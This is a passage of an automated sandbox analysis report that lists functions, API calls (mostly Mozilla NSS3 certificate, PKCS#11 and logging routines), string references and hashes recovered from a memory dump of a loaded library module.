Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

Strings

/G6/, xrefs: 6C78CC82

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID: /G6/
API String ID: 1351604052-570549270
Opcode ID: 4e556fa10295790003bfc20d770465c65ff5eca075038c2f0e4037aafecf0939
Instruction ID: 914960896632e9e5d0525be52ab542e775684f24261c68d25e304f7ec63ecfa9
Opcode Fuzzy Hash: 4e556fa10295790003bfc20d770465c65ff5eca075038c2f0e4037aafecf0939
Instruction Fuzzy Hash: 00C1B1B1A012199BDB20CF24CD84BDAB7B4BF48318F1441B9EA4897741E775EE94CF90

Function 6C742C30 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(E436472F), ref: 6C742C5D

Part of subcall function 6C7A0D30: calloc.MOZGLUE ref: 6C7A0D50
Part of subcall function 6C7A0D30: TlsGetValue.KERNEL32 ref: 6C7A0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C742C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C742CE0

Part of subcall function 6C742E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C742CDA,?,00000000), ref: 6C742E1E
Part of subcall function 6C742E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C742E33
Part of subcall function 6C742E00: TlsGetValue.KERNEL32 ref: 6C742E4E
Part of subcall function 6C742E00: EnterCriticalSection.KERNEL32(?), ref: 6C742E5E
Part of subcall function 6C742E00: PL_HashTableLookup.NSS3(?), ref: 6C742E71
Part of subcall function 6C742E00: PL_HashTableRemove.NSS3(?), ref: 6C742E84
Part of subcall function 6C742E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C742E96
Part of subcall function 6C742E00: PR_Unlock.NSS3 ref: 6C742EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C742D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C742D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C742D3F
free.MOZGLUE(00000000), ref: 6C742D73
CERT_DestroyCertificate.NSS3(?), ref: 6C742DB8
free.MOZGLUE ref: 6C742DC8

Part of subcall function 6C743E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C743EC2
Part of subcall function 6C743E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C743ED6
Part of subcall function 6C743E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C743EEE
Part of subcall function 6C743E60: PR_CallOnce.NSS3(6C8A2AA4,6C7A12D0), ref: 6C743F02
Part of subcall function 6C743E60: PL_FreeArenaPool.NSS3 ref: 6C743F14
Part of subcall function 6C743E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C743F27

Strings

/G6/, xrefs: 6C742C42

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID: /G6/
API String ID: 3941837925-570549270
Opcode ID: 7d89b6f0beb5551ce844d724b2db7a51f85f9cf8072ffe1d3f8312147d2c2113
Instruction ID: b3d9eea427b8b95dd57c7303553aa9f377e85f277fff687aaea3f3fa0f5d2eab
Opcode Fuzzy Hash: 7d89b6f0beb5551ce844d724b2db7a51f85f9cf8072ffe1d3f8312147d2c2113
Instruction Fuzzy Hash: 1251E171A042119BDB11DE29DE8AB6B77E5EF84348F158438EC55C3650EB31E824CB92

Function 6C768F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C768FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C768FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C768FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C769013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C769042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C76905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C769073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C7690EC

Part of subcall function 6C730F00: PR_GetPageSize.NSS3(6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F1B
Part of subcall function 6C730F00: PR_NewLogModule.NSS3(clock,6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C75DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C769111

Strings

/G6/, xrefs: 6C768F7C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID: /G6/
API String ID: 2831689957-570549270
Opcode ID: 8880665e057b215c21c5a5de2704a61767a2a26eba3ba6d47c0dc46aa28acc86
Instruction ID: d6bc8527c4f32f9f40ec3154fdd3f0fc39d677daef81247eb88fb762495bcda1
Opcode Fuzzy Hash: 8880665e057b215c21c5a5de2704a61767a2a26eba3ba6d47c0dc46aa28acc86
Instruction Fuzzy Hash: B1518870A04205CFCF10EF7AC688299BBF4AF4A318F055579DC489BB06EB35E884CB81

Function 6C74E910 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149memorystringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,http://,00000007), ref: 6C74E93B
PR_SetError.NSS3(FFFFE075,00000000), ref: 6C74E94E
PORT_Alloc_Util.NSS3(00000001), ref: 6C74E995
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C74E9A7
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 6C74E9CA
PORT_Strdup_Util.NSS3(6C88933E), ref: 6C74EA17
PORT_Alloc_Util.NSS3(00000001), ref: 6C74EA28

Part of subcall function 6C7A0BE0: malloc.MOZGLUE(6C798D2D,?,00000000,?), ref: 6C7A0BF8
Part of subcall function 6C7A0BE0: TlsGetValue.KERNEL32(6C798D2D,?,00000000,?), ref: 6C7A0C15

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C74EA3C
free.MOZGLUE(?), ref: 6C74EA69

Strings

http://, xrefs: 6C74E935

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Alloc_memcpy$ErrorL_strncasecmpStrdup_Valuefreemallocstrtol
String ID: http://
API String ID: 3982757857-1121587658
Opcode ID: bb462615a36d46c763c669f67854fd743de6d7a7988098c41af7eb7966c9afaa
Instruction ID: bf96e499b118561ad04ca5d39604358871e9e75c7517227fb121c09746fcae90
Opcode Fuzzy Hash: bb462615a36d46c763c669f67854fd743de6d7a7988098c41af7eb7966c9afaa
Instruction Fuzzy Hash: 42416D64A4850E4BDB60CA688E417FAFF65BF0733CF148431D89597BC1E2215546C3E7

Function 6C7B0B00 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7B0B21

Part of subcall function 6C79BE30: SECOID_FindOID_Util.NSS3(6C75311B,00000000,?,6C75311B,?), ref: 6C79BE44

Part of subcall function 6C788500: SECOID_GetAlgorithmTag_Util.NSS3(6C7895DC,00000000,00000000,00000000,?,6C7895DC,00000000,00000000,?,6C767F4A,00000000,?,00000000,00000000), ref: 6C788517

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7B0B64

Part of subcall function 6C79FAB0: free.MOZGLUE(?,-00000001,?,?,6C73F673,00000000,00000000), ref: 6C79FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7B0B72
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C7B0BA1
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C7B0BB1
PK11_CreateContextBySymKey.NSS3(-00000001,00000105,?,?), ref: 6C7B0BF3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C7B0C00

Part of subcall function 6C7895C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C767F4A,00000000,?,00000000,00000000), ref: 6C7895E0
Part of subcall function 6C7895C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C767F4A,00000000,?,00000000,00000000), ref: 6C7895F5
Part of subcall function 6C7895C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C789609
Part of subcall function 6C7895C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C78961D
Part of subcall function 6C7895C0: PK11_GetInternalSlot.NSS3 ref: 6C78970B
Part of subcall function 6C7895C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C789756
Part of subcall function 6C7895C0: PK11_GetIVLength.NSS3(?), ref: 6C789767
Part of subcall function 6C7895C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C78977E
Part of subcall function 6C7895C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C78978E

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7B0C29

Strings

/G6/, xrefs: 6C7B0B0F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$K11_Tag_$Item_$FindZfree$Algorithm$Length$Alloc_BlockContextCreateFreeInternalSizeSlotfree
String ID: /G6/
API String ID: 2322824727-570549270
Opcode ID: 6da95aee20a89455cc1a9de9539149acc566735b53ac6ec0c71e38c22d0ef4d3
Instruction ID: c6ad01fe9041bbabb52a03846b4a7d418fbec8584a2fce4555e8bd9937f197d6
Opcode Fuzzy Hash: 6da95aee20a89455cc1a9de9539149acc566735b53ac6ec0c71e38c22d0ef4d3
Instruction Fuzzy Hash: 8331A4F29002445BE7109F29EF49BAB76B8AF0435CF040535E91AA7B52F771E908C7E2

Function 6C776C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C776C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C776C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C776CA3

Part of subcall function 6C85D930: PL_strncpyz.NSS3(?,?,?), ref: 6C85D963

PR_LogPrint.NSS3(?,00000000), ref: 6C776CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C776CD5

Strings

(CK_INVALID_HANDLE), xrefs: 6C776C9C
/G6/, xrefs: 6C776C4C
pMechanism = 0x%p, xrefs: 6C776CD0
C_DigestInit, xrefs: 6C776C61
hSession = 0x%x, xrefs: 6C776C7E, 6C776C8E

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$/G6/$C_DigestInit
API String ID: 1003633598-284577640
Opcode ID: 695663f26cfaa079d4f4687db16be19462077ba685a45d50c7a718bd3674cb7b
Instruction ID: c8ff7487722597c67a5b9b4f7b85c2cf20971ead58445d0576f5ed7424377dfd
Opcode Fuzzy Hash: 695663f26cfaa079d4f4687db16be19462077ba685a45d50c7a718bd3674cb7b
Instruction Fuzzy Hash: 6F21B1717011189BDF309BAAAF4DB9E37A5EB4221DF444435E90D97B02DB34A948CBE2

Function 6C740F30 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C740F62
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C740F84

Part of subcall function 6C79B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8718D0,?), ref: 6C79B095

SEC_QuickDERDecodeItem_Util.NSS3(?,6C75F59B,6C86890C,?), ref: 6C740FA8
PORT_Alloc_Util.NSS3(4C8B1474), ref: 6C740FC1

Part of subcall function 6C7A0BE0: malloc.MOZGLUE(6C798D2D,?,00000000,?), ref: 6C7A0BF8
Part of subcall function 6C7A0BE0: TlsGetValue.KERNEL32(6C798D2D,?,00000000,?), ref: 6C7A0C15

memcpy.VCRUNTIME140(00000000,?,4C8B1474), ref: 6C740FDB
PR_CallOnce.NSS3(6C8A2AA4,6C7A12D0), ref: 6C740FEF
PL_FreeArenaPool.NSS3(?), ref: 6C741001
PL_FinishArenaPool.NSS3(?), ref: 6C741009

Strings

security, xrefs: 6C740F5C
/G6/, xrefs: 6C740F3F

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: ArenaPoolUtil$DecodeItem_Quick$Alloc_CallErrorFinishFreeInitOnceValuemallocmemcpy
String ID: /G6/$security
API String ID: 2061345354-2919133760
Opcode ID: 689e5f20279596152218b6f919ebe1a7bfee8e95c906280f3df85e0c06fd4acb
Instruction ID: 870e258d1b4bdd113c21fc8b85181b44ca95d583cfb8ec67e6bb0b543cf98f1f
Opcode Fuzzy Hash: 689e5f20279596152218b6f919ebe1a7bfee8e95c906280f3df85e0c06fd4acb
Instruction Fuzzy Hash: 40210671904204ABE7209F69DE44AAF7BB4EF4565CF008929FC1896701F731EA1ACBD2

Function 6C772CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C772CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C772D07

Part of subcall function 6C8509D0: PR_Now.NSS3 ref: 6C850A22
Part of subcall function 6C8509D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C850A35
Part of subcall function 6C8509D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C850A66
Part of subcall function 6C8509D0: PR_GetCurrentThread.NSS3 ref: 6C850A70
Part of subcall function 6C8509D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C850A9D
Part of subcall function 6C8509D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C850AC8
Part of subcall function 6C8509D0: PR_vsmprintf.NSS3(?,?), ref: 6C850AE8
Part of subcall function 6C8509D0: EnterCriticalSection.KERNEL32(?), ref: 6C850B19
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C850B48
Part of subcall function 6C8509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C850C76
Part of subcall function 6C8509D0: PR_LogFlush.NSS3 ref: 6C850C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C772D22

Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(?), ref: 6C850B88
Part of subcall function 6C8509D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C850C5D
Part of subcall function 6C8509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C850C8D
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850C9C
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(?), ref: 6C850CD1
Part of subcall function 6C8509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C850CEC
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850CFB
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C850D16
Part of subcall function 6C8509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C850D26
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850D35
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C850D65
Part of subcall function 6C8509D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C850D70
Part of subcall function 6C8509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C850D90
Part of subcall function 6C8509D0: free.MOZGLUE(00000000), ref: 6C850D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C772D3B

Part of subcall function 6C8509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C850BAB
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850BBA
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C772D54

Part of subcall function 6C8509D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C850BCB
Part of subcall function 6C8509D0: EnterCriticalSection.KERNEL32(?), ref: 6C850BDE
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(?), ref: 6C850C16

Strings

ulPinLen = %d, xrefs: 6C772D36
pLabel = 0x%p, xrefs: 6C772D4F
pPin = 0x%p, xrefs: 6C772D1D
C_InitToken, xrefs: 6C772CE7
slotID = 0x%x, xrefs: 6C772D02

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: 05c9ed76a2a6a7489f2063a61717b015fe21eb8b253763ed314506d2e0f7b05b
Instruction ID: 4413fae28a09cce655e6d3e6a95ebb840448d10fa03e3878a5194d604ce7e0d8
Opcode Fuzzy Hash: 05c9ed76a2a6a7489f2063a61717b015fe21eb8b253763ed314506d2e0f7b05b
Instruction Fuzzy Hash: 5321B276300148EFDB309BA5EF4DA9D3BB1EB8231DF444474E51897A22DB34A818DBB1

Function 6C772AF0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetMechanismList), ref: 6C772B0C
PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6C772B59

Part of subcall function 6C8509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C850BAB
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850BBA
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850D7E

PR_LogPrint.NSS3( pMechanismList = 0x%p,?), ref: 6C772B3E

Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(?), ref: 6C850B88
Part of subcall function 6C8509D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C850C5D
Part of subcall function 6C8509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C850C8D
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850C9C
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(?), ref: 6C850CD1
Part of subcall function 6C8509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C850CEC
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850CFB
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C850D16
Part of subcall function 6C8509D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C850D26
Part of subcall function 6C8509D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C850D35
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C850D65
Part of subcall function 6C8509D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C850D70
Part of subcall function 6C8509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C850D90
Part of subcall function 6C8509D0: free.MOZGLUE(00000000), ref: 6C850D99

PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C772B25

Part of subcall function 6C8509D0: PR_Now.NSS3 ref: 6C850A22
Part of subcall function 6C8509D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C850A35
Part of subcall function 6C8509D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C850A66
Part of subcall function 6C8509D0: PR_GetCurrentThread.NSS3 ref: 6C850A70
Part of subcall function 6C8509D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C850A9D
Part of subcall function 6C8509D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C850AC8
Part of subcall function 6C8509D0: PR_vsmprintf.NSS3(?,?), ref: 6C850AE8
Part of subcall function 6C8509D0: EnterCriticalSection.KERNEL32(?), ref: 6C850B19
Part of subcall function 6C8509D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C850B48
Part of subcall function 6C8509D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C850C76
Part of subcall function 6C8509D0: PR_LogFlush.NSS3 ref: 6C850C7E

PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6C772BC0

Strings

C_GetMechanismList, xrefs: 6C772B07
pMechanismList = 0x%p, xrefs: 6C772B39
*pulCount = 0x%x, xrefs: 6C772BBB
slotID = 0x%x, xrefs: 6C772B20
pulCount = 0x%p, xrefs: 6C772B54

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
